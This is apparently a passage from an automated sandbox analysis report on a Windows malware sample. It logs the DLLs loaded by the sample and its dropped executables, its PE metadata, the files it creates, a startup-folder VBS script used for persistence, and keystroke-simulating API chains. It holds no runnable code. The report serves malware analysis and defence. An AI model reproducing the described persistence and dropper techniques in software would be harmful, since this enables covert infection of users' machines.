Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeWindow detected: Number of UI elements: 20
                  Source: 8kDIr4ZdNj.exeStatic file information: File size 2382336 > 1048576
                  Source: 8kDIr4ZdNj.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x17d200
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 8kDIr4ZdNj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: lecheries.exe, 00000002.00000003.2174226820.0000000004460000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2175460108.0000000004480000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2296077476.0000000004380000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2293614449.00000000041E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: lecheries.exe, 00000002.00000003.2174226820.0000000004460000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2175460108.0000000004480000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2296077476.0000000004380000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2293614449.00000000041E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: 8kDIr4ZdNj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 8kDIr4ZdNj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 8kDIr4ZdNj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 8kDIr4ZdNj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 8kDIr4ZdNj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00894B37 LoadLibraryA,GetProcAddress,0_2_00894B37
                  Source: EmbeddedExe1.exe.3.drStatic PE information: section name: .00cfg
                  Source: EmbeddedExe1.exe.3.drStatic PE information: section name: .gxfg
                  Source: EmbeddedExe1.exe.3.drStatic PE information: section name: _RDATA
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008A4257 push edi; ret 0_2_008A4259
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008A426B push edi; ret 0_2_008A426D
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B8945 push ecx; ret 0_2_008B8958
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008D794B pushad ; retf 0_2_008D794C
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B7426B push edi; ret 2_2_00B7426D
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B74257 push edi; ret 2_2_00B74259
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B6E79B pushad ; retn 0000h2_2_00B6E79C
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8B7C7 push esi; ret 2_2_00B8B7C9
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8B8BC push edi; ret 2_2_00B8B8BE
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8B816 push edi; ret 2_2_00B8B818
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B88945 push ecx; ret 2_2_00B88958
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B6EAA8 pushad ; retn 0000h2_2_00B6EAA9
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B70A41 push edi; retn 0000h2_2_00B70A42
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B70B89 push edi; retn 0000h2_2_00B70B94
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeFile created: C:\Users\user\AppData\Local\konked\lecheries.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeJump to dropped file

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\konked\lecheries.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008948D7
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00B648D7
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB97B0 IsIconic,ShowWindow,5_2_00007FF75ECB97B0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB9610 IsIconic,SetWindowTextW,SetWindowTextA,5_2_00007FF75ECB9610
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB96E0 IsIconic,SetWindowTextW,SetWindowTextA,5_2_00007FF75ECB96E0
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008B3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008B3187
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
